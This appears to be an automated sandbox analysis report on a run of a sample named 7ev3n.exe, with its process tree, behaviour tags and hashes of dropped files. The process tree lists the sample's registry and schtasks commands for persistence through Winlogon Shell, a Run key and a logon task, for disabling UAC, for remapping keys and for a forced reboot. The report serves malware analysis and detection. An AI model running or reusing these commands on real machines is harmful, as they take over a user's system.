                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4052 /prefetch:8
                                    2⤵
                                      PID:3260
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4052 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2016
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
                                      2⤵
                                        PID:648
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
                                        2⤵
                                          PID:5388
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5576 /prefetch:8
                                          2⤵
                                            PID:5712
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5616 /prefetch:8
                                            2⤵
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5720
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
                                            2⤵
                                              PID:5184
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4396 /prefetch:1
                                              2⤵
                                                PID:6024
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
                                                2⤵
                                                  PID:6000
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
                                                  2⤵
                                                    PID:3452
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
                                                    2⤵
                                                      PID:4676
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
                                                      2⤵
                                                        PID:6000
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
                                                        2⤵
                                                          PID:3792
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6372 /prefetch:8
                                                          2⤵
                                                            PID:4240
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
                                                            2⤵
                                                              PID:1316
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6808 /prefetch:8
                                                              2⤵
                                                                PID:2160
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6812 /prefetch:8
                                                                2⤵
                                                                  PID:1604
                                                                • C:\Users\Admin\Downloads\7ev3n.exe
                                                                  "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • NTFS ADS
                                                                  PID:3760
                                                                  • C:\Users\Admin\AppData\Local\system.exe
                                                                    "C:\Users\Admin\AppData\Local\system.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:452
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2716
                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                      C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:3540
                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5412
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                        5⤵
                                                                        • Modifies WinLogon for persistence
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5796
                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5304
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                        5⤵
                                                                        • Adds Run key to start application
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5800
                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5352
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5724
                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5356
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5964
                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5560
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5908
                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1432
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                        5⤵
                                                                        • UAC bypass
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5756
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3824
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5532
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4320
                                                                      • C:\Windows\SysWOW64\shutdown.exe
                                                                        shutdown -r -t 10 -f
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4572
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                                                                  2⤵
                                                                    PID:1400
                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                  1⤵
                                                                    PID:3868
                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                    1⤵
                                                                      PID:1216
                                                                    • C:\Windows\system32\LogonUI.exe
                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa397a855 /state1:0x41c64e6d
                                                                      1⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:5664

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\S500RAT.exe.log

                                                                      Filesize

                                                                      42B

                                                                      MD5

                                                                      84cfdb4b995b1dbf543b26b86c863adc

                                                                      SHA1

                                                                      d2f47764908bf30036cf8248b9ff5541e2711fa2

                                                                      SHA256

                                                                      d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

                                                                      SHA512

                                                                      485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                      Filesize

                                                                      152B

                                                                      MD5

                                                                      ff63763eedb406987ced076e36ec9acf

                                                                      SHA1

                                                                      16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

                                                                      SHA256

                                                                      8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

                                                                      SHA512

                                                                      ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                      Filesize

                                                                      152B

                                                                      MD5

                                                                      2783c40400a8912a79cfd383da731086

                                                                      SHA1

                                                                      001a131fe399c30973089e18358818090ca81789

                                                                      SHA256

                                                                      331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

                                                                      SHA512

                                                                      b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\9af4f3c9-c130-4195-ad9f-3545ac8f909c.tmp

                                                                      Filesize

                                                                      7KB

                                                                      MD5

                                                                      da92041ff0a5f195a7b6a5900d9e69f0

                                                                      SHA1

                                                                      fe806fc1e86595d6dbf73bcda3486bac6894e51e

                                                                      SHA256

                                                                      90a001b2e7a168dbb313757da0efbf266d2e7092dd270a2626da64266a4da97e

                                                                      SHA512

                                                                      152e52b427991a3e86b99d485fdedfbb7979bf9d2ce703052c28626950569fd4b062bc8ad152248673af4018bfd943f65b245e11cc6aa6f98661c395b2a2024f

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      d6b36c7d4b06f140f860ddc91a4c659c

                                                                      SHA1

                                                                      ccf16571637b8d3e4c9423688c5bd06167bfb9e9

                                                                      SHA256

                                                                      34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

                                                                      SHA512

                                                                      2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

                                                                      Filesize

                                                                      69KB

                                                                      MD5

                                                                      24a806fccb1d271a0e884e1897f2c1bc

                                                                      SHA1

                                                                      11bde7bb9cc39a5ef1bcddfc526f3083c9f2298a

                                                                      SHA256

                                                                      e83f90413d723b682d15972abeaaa71b9cead9b0c25bf8aac88485d4be46fb85

                                                                      SHA512

                                                                      33255665affcba0a0ada9cf3712ee237c92433a09cda894d63dd1384349e2159d0fe06fa09cca616668ef8fcbb8d0a73ef381d30702c20aad95fc5e9396101ae

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                      Filesize

                                                                      41KB

                                                                      MD5

                                                                      ed3c7f5755bf251bd20441f4dc65f5bf

                                                                      SHA1

                                                                      3919a57831d103837e0cc158182ac10b903942c5

                                                                      SHA256

                                                                      55cbb893756192704a23a400bf8f874e29c0feee435f8831af9cbe975d0ef85d

                                                                      SHA512

                                                                      c79460ded439678b6ebf2def675cbc5f15068b9ea4b19263439c3cca4fa1083dc278149cde85f551cd2ffc2c77fd1dc193200c683fc1c3cdac254e533df84f06

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

                                                                      Filesize

                                                                      19KB

                                                                      MD5

                                                                      2e86a72f4e82614cd4842950d2e0a716

                                                                      SHA1

                                                                      d7b4ee0c9af735d098bff474632fc2c0113e0b9c

                                                                      SHA256

                                                                      c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

                                                                      SHA512

                                                                      7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

                                                                      Filesize

                                                                      63KB

                                                                      MD5

                                                                      710d7637cc7e21b62fd3efe6aba1fd27

                                                                      SHA1

                                                                      8645d6b137064c7b38e10c736724e17787db6cf3

                                                                      SHA256

                                                                      c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

                                                                      SHA512

                                                                      19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

                                                                      Filesize

                                                                      88KB

                                                                      MD5

                                                                      b38fbbd0b5c8e8b4452b33d6f85df7dc

                                                                      SHA1

                                                                      386ba241790252df01a6a028b3238de2f995a559

                                                                      SHA256

                                                                      b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

                                                                      SHA512

                                                                      546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      027a77a637cb439865b2008d68867e99

                                                                      SHA1

                                                                      ba448ff5be0d69dbe0889237693371f4f0a2425e

                                                                      SHA256

                                                                      6f0e8c5ae26abbae3efc6ca213cacaaebd19bf2c7ed88495289a8f40428803dd

                                                                      SHA512

                                                                      66f8fbdd68de925148228fe1368d78aa8efa5695a2b4f70ab21a0a4eb2e6e9f0f54ed57708bd9200c2bbe431b9d09e5ca08c3f29a4347aeb65b090790652b5c4

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

                                                                      Filesize

                                                                      43KB

                                                                      MD5

                                                                      d9b427d32109a7367b92e57dae471874

                                                                      SHA1

                                                                      ce04c8aeb6d89d0961f65b28a6f4a03381fc9c39

                                                                      SHA256

                                                                      9b02f8fe6810cacb76fbbcefdb708f590e22b1014dcae2732b43896a7ac060f3

                                                                      SHA512

                                                                      dcabc4223745b69039ea6a634b2c5922f0a603e5eeb339f42160adc41c33b74911bb5a3daa169cd01c197aeaca09c5e4a34e759b64f552d15f7a45816105fb07

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

                                                                      Filesize

                                                                      74KB

                                                                      MD5

                                                                      b07f576446fc2d6b9923828d656cadff

                                                                      SHA1

                                                                      35b2a39b66c3de60e7ec273bdf5e71a7c1f4b103

                                                                      SHA256

                                                                      d261915939a3b9c6e9b877d3a71a3783ed5504d3492ef3f64e0cb508fee59496

                                                                      SHA512

                                                                      7358cbb9ddd472a97240bd43e9cc4f659ff0f24bf7c2b39c608f8d4832da001a95e21764160c8c66efd107c55ff1666a48ecc1ad4a0d72f995c0301325e1b1df

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

                                                                      Filesize

                                                                      27KB

                                                                      MD5

                                                                      903acff81aec95fb624ad47960f14af1

                                                                      SHA1

                                                                      de8d7f3ae08621987d76e176118e1da6a7c2475f

                                                                      SHA256

                                                                      05d439f7aa4807ebfe90919429e6c6d352ea3816ce6a9592f4df42c2b22871d8

                                                                      SHA512

                                                                      c25bcf91200f1ddd174f17f2f95e3292cc8702884c3c0d79803a55effbddf66f43b7c243644c12e788cc1367d2f335ca67e07ec0053b066820719301693db767

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

                                                                      Filesize

                                                                      25KB

                                                                      MD5

                                                                      b7acbc2406a7f663f4fbe535b112d734

                                                                      SHA1

                                                                      602ffdcae76ca3911638870f244d16ee4522a11c

                                                                      SHA256

                                                                      5d3df9af4acbf8773676af0ea887e966bb0f8dcccc6f4f9040d9b6884d3ba51f

                                                                      SHA512

                                                                      6b20ee9771a2b9234bcb4ced194b1fe58fae7ae75a3815b740b0b72a9b2a58be77b1ed20b919ea8a9675eb8f708a1b4df37ed8c013549bb85e44118f1362350e

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

                                                                      Filesize

                                                                      18KB

                                                                      MD5

                                                                      554cd6a4079912a0ed1607fdf406325f

                                                                      SHA1

                                                                      865d1a8be2e58d3f3fb3b8358e892a6c3afb1df9

                                                                      SHA256

                                                                      432728a1fbf4423ed72a78abe7946449adef4ac97d84598578a982fb1e213cac

                                                                      SHA512

                                                                      427bb782db487d3625b12161a6cee4ab10bacb30353ec4c8a7d891b02e3aead308157ae57b50fd029c94fe2562b172fda945fd2dfdbd09c237e719f5ca0b45a5

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                      Filesize

                                                                      4KB

                                                                      MD5

                                                                      706f35efb616130e5c34fd3586362ecc

                                                                      SHA1

                                                                      f89eea68895f748c1f4ba895a2c199264e7d360e

                                                                      SHA256

                                                                      d8944896cb83d3ef91a7fe5f508195b4cfbd7731a046864a4241934cf45eab70

                                                                      SHA512

                                                                      753dfbdb80758bf16d743cf03a533ccf37de2abfc0fea9c7f6b77a0e2d87924be57d61cb74650adc24b3bce25df8cd771c88a81b9f33063aee9ad3eca2fd2843

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                      Filesize

                                                                      922B

                                                                      MD5

                                                                      552cafb35a5e67926ef4a3651e5c3f7a

                                                                      SHA1

                                                                      528c2c4a9e87556d9c9d2e44a2fd504cf7e53787

                                                                      SHA256

                                                                      937158044a0cf96e7ba7ea68c4daf4ff968f751cd05467100d2381f34dc71d78

                                                                      SHA512

                                                                      4a2720a60dc5d9702f8dc07e46b13b226713d194810594a3bf8882868b73400e5020420a209b43f3c9c28f2367fa696fec473ca9e054a1ec30eab2df42fff1c5

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      78617c2565856464aa183883ae03db6c

                                                                      SHA1

                                                                      87fad6c013781590a871dfe5d26cb2a259ff42ec

                                                                      SHA256

                                                                      acfc9a35b8d7e355ad7ade08bb87a1e47a17b14569bba2b6b3d45cd8df8fa443

                                                                      SHA512

                                                                      6355034a7a78ae1d4c73fb8aa7f23f39ffb9f124a606f50cc83717e3140691d36f930dbcec5094ac90a8bc86eddd359d3dbf065ffb55952229e2cfdc813509d3

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      bfc65f75a98d67a45d285d28720bef8a

                                                                      SHA1

                                                                      93d550c0a36416c9400e029d9df5d445cf5f846a

                                                                      SHA256

                                                                      47d2963bf1c3b658f1793fd3ceedbbac4d3892daf9059d5ee8e396aa18d7f339

                                                                      SHA512

                                                                      a91d3af6d269118abb8041e7da9059577ae78018a0cb5ffcf7f21cafbd8765433d268e79ed3d1d19fd8357c7aaa213f6100e716f37d1c32411f80e1fa01633b9

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      7KB

                                                                      MD5

                                                                      ac919a4a552cd58a4726f72787ff3d05

                                                                      SHA1

                                                                      394b1778bee2fd69b81b12242420f05d9593911e

                                                                      SHA256

                                                                      2e2cb26c44a48035fe36a948191cfbdbc42c153d67970486fabc505748c6917a

                                                                      SHA512

                                                                      c0e0c6139878abbb317c49296ec4d163f318a59701160ca55b00940403eaac132374ea543440b2c3b10fc2b1b342eb5900307e35f0eb775767b43c6355be0c79

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      7KB

                                                                      MD5

                                                                      7c0f5635d4a83d64d6ea91feb4464131

                                                                      SHA1

                                                                      b7e88309543c81ab1133402217f3dce92b2e715c

                                                                      SHA256

                                                                      7624af6de7779ede25d1ee2bca79ad6deaa5437f3c14e19b244780a595ee2206

                                                                      SHA512

                                                                      667015438c74b7f5c319223bcf868a8287836900b8d23fd379073329cb8178d9db5a3b61f0e14e5ef0624338753fad970a60274de68e29a62d633ebcaf9223f1

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      7KB

                                                                      MD5

                                                                      5e8e9bde0c841ccc906b28fdf68314ba

                                                                      SHA1

                                                                      7f19385225bc7864eae513b5cede9d7f4974b057

                                                                      SHA256

                                                                      7f5387d09a26f34bc7a331019632710c55807f8ff454a0c4ffd9ed8bde332db3

                                                                      SHA512

                                                                      6ef172b14a772621e44289c1d3aedf2df5c32610c4d9c59b27d0062989889d58d6f76dea9b9a24b5af7b3d11392b26a8b591d2ff396d7b14a1d621bcf799e0ee

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      fac06875ed5539c242f0a441cadda8f7

                                                                      SHA1

                                                                      21c321edcdacc59b5894ea4aeebfb9046d20f165

                                                                      SHA256

                                                                      a1e383b617eafe8854161022e8e5e4db906f900cef30f68aebdfa0bbeee825e5

                                                                      SHA512

